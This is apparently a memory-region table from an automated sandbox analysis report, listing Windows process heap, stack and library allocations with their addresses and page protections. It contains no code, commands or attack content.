page execute and read and write
|
||
|
20D7E8D0000
|
heap
|
page read and write
|
||
|
20D7DEF0000
|
heap
|
page read and write
|
||
|
7FFD34450000
|
trusted library allocation
|
page read and write
|
||
|
2834FF40000
|
trusted library allocation
|
page read and write
|
||
|
1F10663B000
|
heap
|
page read and write
|
||
|
14F6E670000
|
heap
|
page read and write
|
||
|
230699D0000
|
heap
|
page read and write
|
||
|
14F6E57A000
|
heap
|
page read and write
|
||
|
420113F000
|
unkown
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page read and write
|
||
|
23051A24000
|
trusted library allocation
|
page read and write
|
||
|
F1B343E000
|
stack
|
page read and write
|
||
|
7FFD341CB000
|
trusted library allocation
|
page read and write
|
||
|
20D7C5D0000
|
heap
|
page readonly
|
||
|
20D7E4C0000
|
heap
|
page execute and read and write
|
||
|
2304F8B0000
|
heap
|
page read and write
|
||
|
23ADFF9000
|
stack
|
page read and write
|
||
|
20D7C633000
|
trusted library allocation
|
page read and write
|
||
|
20D7E3EB000
|
heap
|
page read and write
|
||
|
1F108D51000
|
heap
|
page read and write
|
||
|
14F6E490000
|
heap
|
page read and write
|
||
|
7FFD34470000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
|
2834FDFA000
|
heap
|
page read and write
|
||
|
20D7E3C0000
|
heap
|
page read and write
|
||
|
28351C57000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page execute and read and write
|
||
|
2834FD49000
|
heap
|
page read and write
|
||
|
230616E6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3425C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD341BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3435A000
|
trusted library allocation
|
page read and write
|
||
|
2834FD8D000
|
heap
|
page read and write
|
||
|
20D7C5F0000
|
heap
|
page execute and read and write
|
||
|
230513E6000
|
heap
|
page read and write
|
||
|
7FFD34352000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34260000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
|
20D7E6D0000
|
heap
|
page read and write
|
||
|
20D7E429000
|
heap
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
|
F1B30FF000
|
stack
|
page read and write
|
||
|
2834FF04000
|
heap
|
page read and write
|
||
|
2304FA80000
|
trusted library allocation
|
page read and write
|
||
|
2304F8F6000
|
heap
|
page read and write
|
||
|
28361B50000
|
trusted library allocation
|
page read and write
|
||
|
20D7C744000
|
heap
|
page read and write
|
||
|
28351C54000
|
trusted library allocation
|
page read and write
|
||
|
1F10669D000
|
heap
|
page read and write
|
||
|
1F106869000
|
heap
|
page read and write
|
||
|
B1F59FE000
|
stack
|
page read and write
|
||
|
1F106695000
|
heap
|
page read and write
|
||
|
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
|
20D00C2D000
|
trusted library allocation
|
page read and write
|
||
|
E9AD0FE000
|
stack
|
page read and write
|
||
|
20D10001000
|
trusted library allocation
|
page read and write
|
||
|
20D7C5C0000
|
trusted library allocation
|
page read and write
|
||
|
28369E90000
|
heap
|
page read and write
|
||
|
2306994B000
|
heap
|
page read and write
|
||
|
20D7C4A0000
|
trusted library allocation
|
page read and write
|
||
|
20D7C6E0000
|
heap
|
page read and write
|
||
|
28351A00000
|
heap
|
page read and write
|
||
|
7FFD34382000
|
trusted library allocation
|
page read and write
|
||
|
E9AC783000
|
stack
|
page read and write
|
||
|
7FFD343F0000
|
trusted library allocation
|
page read and write
|
||
|
1F10B5B0000
|
heap
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
|
20D01945000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
|
1F1066D9000
|
heap
|
page read and write
|
||
|
28351C9A000
|
trusted library allocation
|
page read and write
|
||
|
F1B307E000
|
stack
|
page read and write
|
||
|
F1B373E000
|
stack
|
page read and write
|
||
|
283519AF000
|
heap
|
page read and write
|
||
|
14F6E390000
|
heap
|
page read and write
|
||
|
20D7C4C0000
|
heap
|
page read and write
|
||
|
2304FAD0000
|
heap
|
page read and write
|
||
|
1F10668F000
|
heap
|
page read and write
|
||
|
1F109BBF000
|
heap
|
page read and write
|
||
|
23AECCE000
|
stack
|
page read and write
|
||
|
E9ACA7E000
|
stack
|
page read and write
|
||
|
20D7E4A3000
|
heap
|
page read and write
|
||
|
1F108351000
|
heap
|
page read and write
|
||
|
420147E000
|
stack
|
page read and write
|
||
|
7FFD341B4000
|
trusted library allocation
|
page read and write
|
||
|
20D01964000
|
trusted library allocation
|
page read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
2304F890000
|
trusted library allocation
|
page read and write
|
||
|
F1B363E000
|
stack
|
page read and write
|
||
|
230517A5000
|
trusted library allocation
|
page read and write
|
||
|
23052A33000
|
trusted library allocation
|
page read and write
|
||
|
2835205A000
|
trusted library allocation
|
page read and write
|
||
|
230530DE000
|
trusted library allocation
|
page read and write
|
||
|
43765FF000
|
stack
|
page read and write
|
||
|
28351F2E000
|
trusted library allocation
|
page read and write
|
||
|
23069B0E000
|
heap
|
page read and write
|
||
|
28351C51000
|
trusted library allocation
|
page read and write
|
||
|
28351A57000
|
heap
|
page execute and read and write
|
||
|
1F1066DA000
|
heap
|
page read and write
|
||
|
23AED8F000
|
stack
|
page read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
7FFD34470000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
|
23069985000
|
heap
|
page read and write
|
||
|
2834FD00000
|
heap
|
page read and write
|
||
|
20D7C630000
|
trusted library allocation
|
page read and write
|
||
|
230513E4000
|
heap
|
page read and write
|
||
|
1F106682000
|
heap
|
page read and write
|
||
|
2304F8D0000
|
heap
|
page read and write
|
||
|
23051797000
|
trusted library allocation
|
page read and write
|
||
|
28351F0D000
|
trusted library allocation
|
page read and write
|
||
|
2305192B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34440000
|
trusted library allocation
|
page read and write
|
||
|
F1B428D000
|
stack
|
page read and write
|
||
|
23052A3F000
|
trusted library allocation
|
page read and write
|
||
|
28351B41000
|
trusted library allocation
|
page read and write
|
||
|
28351990000
|
heap
|
page read and write
|
||
|
20D7C400000
|
heap
|
page read and write
|
||
|
E9ACC7D000
|
stack
|
page read and write
|
||
|
23052A4E000
|
trusted library allocation
|
page read and write
|
||
|
42014FE000
|
stack
|
page read and write
|
||
|
7FFD34450000
|
trusted library allocation
|
page read and write
|
||
|
1F10668E000
|
heap
|
page read and write
|
||
|
7FFD34266000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34390000
|
trusted library allocation
|
page execute and read and write
|
||
|
2834FFF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341C0000
|
trusted library allocation
|
page read and write
|
||
|
23051A2C000
|
trusted library allocation
|
page read and write
|
||
|
23069EA0000
|
heap
|
page read and write
|
||
|
1F70D5C0000
|
heap
|
page read and write
|
||
|
1F106689000
|
heap
|
page read and write
|
||
|
1F10686B000
|
heap
|
page read and write
|
||
|
7FFD34471000
|
trusted library allocation
|
page read and write
|
||
|
20D01971000
|
trusted library allocation
|
page read and write
|
||
|
2834FCC0000
|
heap
|
page read and write
|
||
|
20D0022D000
|
trusted library allocation
|
page read and write
|
||
|
23069E70000
|
heap
|
page read and write
|
||
|
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
|
1F106669000
|
heap
|
page read and write
|
||
|
23052A30000
|
trusted library allocation
|
page read and write
|
||
|
28351B64000
|
trusted library allocation
|
page read and write
|
||
|
283521B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
1F106695000
|
heap
|
page read and write
|
||
|
7FFD343B0000
|
trusted library allocation
|
page read and write
|
||
|
1F106668000
|
heap
|
page read and write
|
||
|
230699B7000
|
heap
|
page read and write
|
||
|
1F10AA2F000
|
heap
|
page read and write
|
||
|
2306994F000
|
heap
|
page read and write
|
||
|
28351A09000
|
heap
|
page read and write
|
||
|
7FFD34286000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F10AA24000
|
heap
|
page read and write
|
||
|
1F70D8A0000
|
heap
|
page read and write
|
||
|
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34420000
|
trusted library allocation
|
page read and write
|
||
|
20D7C4C7000
|
heap
|
page read and write
|
||
|
F1B34B7000
|
stack
|
page read and write
|
||
|
23069B62000
|
heap
|
page read and write
|
||
|
230512D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34420000
|
trusted library allocation
|
page read and write
|
||
|
B1F56FF000
|
stack
|
page read and write
|
||
|
20D7E64C000
|
heap
|
page read and write
|
||
|
7FFD34392000
|
trusted library allocation
|
page read and write
|
||
|
1F106630000
|
heap
|
page read and write
|
||
|
7FFD34440000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343B0000
|
trusted library allocation
|
page read and write
|
||
|
23AD93D000
|
stack
|
page read and write
|
||
|
2835209E000
|
trusted library allocation
|
page read and write
|
||
|
E9ACB7F000
|
stack
|
page read and write
|
||
|
7FFD34361000
|
trusted library allocation
|
page read and write
|
||
|
28369F90000
|
heap
|
page read and write
|
||
|
20D7C5E0000
|
trusted library allocation
|
page read and write
|
||
|
B1F55FF000
|
stack
|
page read and write
|
||
|
20D01B71000
|
trusted library allocation
|
page read and write
|
||
|
1F106580000
|
heap
|
page read and write
|
||
|
7FFD34260000
|
trusted library allocation
|
page read and write
|
||
|
14F6E774000
|
heap
|
page read and write
|
||
|
2834FCE0000
|
heap
|
page read and write
|
||
|
1F10B5CA000
|
heap
|
page read and write
|
||
|
7FFD342D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F1066E8000
|
heap
|
page read and write
|
||
|
7FFD3426C000
|
trusted library allocation
|
page execute and read and write
|
||
|
23051985000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page execute and read and write
|
||
|
23AE1FE000
|
stack
|
page read and write
|
||
|
28351F02000
|
trusted library allocation
|
page read and write
|
||
|
1F10669C000
|
heap
|
page read and write
|
||
|
7FFD341A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34420000
|
trusted library allocation
|
page read and write
|
||
|
23AD8B3000
|
stack
|
page read and write
|
||
|
23069E90000
|
trusted library section
|
page read and write
|
||
|
2835202D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page read and write
|
||
|
28369FA4000
|
heap
|
page read and write
|
||
|
20D7C54A000
|
heap
|
page read and write
|
||
|
7FFD34296000
|
trusted library allocation
|
page execute and read and write
|
||
|
F1B444C000
|
stack
|
page read and write
|
||
|
7FFD343B0000
|
trusted library allocation
|
page read and write
|
||
|
20D7E66E000
|
heap
|
page read and write
|
||
|
2304F910000
|
heap
|
page read and write
|
||
|
20D7E6C5000
|
heap
|
page read and write
|
||
|
20D7C4FF000
|
heap
|
page read and write
|
||
|
1F10B5CA000
|
heap
|
page read and write
|
||
|
1F10665B000
|
heap
|
page read and write
|
||
|
1F10B5CA000
|
heap
|
page read and write
|
||
|
1F106860000
|
heap
|
page read and write
|
||
|
7FFD341BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
F1B43CC000
|
stack
|
page read and write
|
||
|
F1B383C000
|
stack
|
page read and write
|
||
|
1F70D5D9000
|
heap
|
page read and write
|
||
|
23061400000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
|
42010BC000
|
stack
|
page read and write
|
||
|
7FFD34410000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
23ADEF9000
|
stack
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341A2000
|
trusted library allocation
|
page read and write
|
||
|
20D7E4F0000
|
heap
|
page read and write
|
||
|
2304F810000
|
heap
|
page read and write
|
||
|
28351F3D000
|
trusted library allocation
|
page read and write
|
||
|
20D7E3DF000
|
heap
|
page read and write
|
||
|
1F10667E000
|
heap
|
page read and write
|
||
|
23AE17F000
|
stack
|
page read and write
|
||
|
1F10C6EE000
|
heap
|
page read and write
|
||
|
230517B8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34460000
|
trusted library allocation
|
page read and write
|
||
|
E9AC7CF000
|
stack
|
page read and write
|
||
|
7FFD3436A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD343A0000
|
trusted library allocation
|
page read and write
|
||
|
28369EB0000
|
heap
|
page read and write
|
||
|
2304F8EE000
|
heap
|
page read and write
|
||
|
23052A3B000
|
trusted library allocation
|
page read and write
|
||
|
23ADC7E000
|
stack
|
page read and write
|
||
|
F1B36BE000
|
stack
|
page read and write
|
||
|
1F1064A0000
|
heap
|
page read and write
|
||
|
23052A16000
|
trusted library allocation
|
page read and write
|
||
|
20D101B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34351000
|
trusted library allocation
|
page read and write
|
||
|
23051300000
|
trusted library allocation
|
page read and write
|
||
|
20D7C4E2000
|
heap
|
page read and write
|
||
|
2305146D000
|
trusted library allocation
|
page read and write
|
||
|
23069953000
|
heap
|
page read and write
|
||
|
1F106692000
|
heap
|
page read and write
|
||
|
1F1066AE000
|
heap
|
page read and write
|
||
|
B1F5BFC000
|
stack
|
page read and write
|
||
|
7FFD34440000
|
trusted library allocation
|
page read and write
|
||
|
230699A6000
|
heap
|
page read and write
|
||
|
230519AB000
|
trusted library allocation
|
page read and write
|
||
|
1F10AA28000
|
heap
|
page read and write
|
||
|
230699F0000
|
heap
|
page read and write
|
||
|
23052A45000
|
trusted library allocation
|
page read and write
|
||
|
1F10B6BB000
|
heap
|
page read and write
|
||
|
230698C6000
|
heap
|
page execute and read and write
|
||
|
23ADF77000
|
stack
|
page read and write
|
||
|
230616D8000
|
trusted library allocation
|
page read and write
|
||
|
1F10B5B1000
|
heap
|
page read and write
|
||
|
23069B89000
|
heap
|
page read and write
|
||
|
2304F938000
|
heap
|
page read and write
|
||
|
23069E60000
|
heap
|
page read and write
|
||
|
2304FAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
|
20D7C420000
|
heap
|
page read and write
|
||
|
28361B41000
|
trusted library allocation
|
page read and write
|
||
|
23ADE7D000
|
stack
|
page read and write
|
||
|
1F106694000
|
heap
|
page read and write
|
||
|
E9ACD7E000
|
stack
|
page read and write
|
||
|
23053143000
|
trusted library allocation
|
page read and write
|
||
|
23051302000
|
trusted library allocation
|
page read and write
|
||
|
20D7C546000
|
heap
|
page read and write
|
||
|
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
|
E9ACEFE000
|
stack
|
page read and write
|
||
|
7FFD34266000
|
trusted library allocation
|
page read and write
|
||
|
230698C0000
|
heap
|
page execute and read and write
|
||
|
20D7E4AE000
|
heap
|
page read and write
|
||
|
28351B5D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34361000
|
trusted library allocation
|
page read and write
|
||
|
20D7C4D4000
|
heap
|
page read and write
|
||
|
23ADD7E000
|
stack
|
page read and write
|
||
|
230693F9000
|
heap
|
page read and write
|
||
|
F1B32FE000
|
stack
|
page read and write
|
||
|
28351C4E000
|
trusted library allocation
|
page read and write
|
||
|
20D7C505000
|
heap
|
page read and write
|
||
|
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
|
1F106865000
|
heap
|
page read and write
|
||
|
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
|
28351C9F000
|
trusted library allocation
|
page read and write
|
||
|
43764FF000
|
unkown
|
page read and write
|
||
|
20D7E6DF000
|
heap
|
page read and write
|
||
|
230530E2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
23053043000
|
trusted library allocation
|
page read and write
|
||
|
20D7C51F000
|
heap
|
page read and write
|
There are 537 hidden memdumps, click here to show them.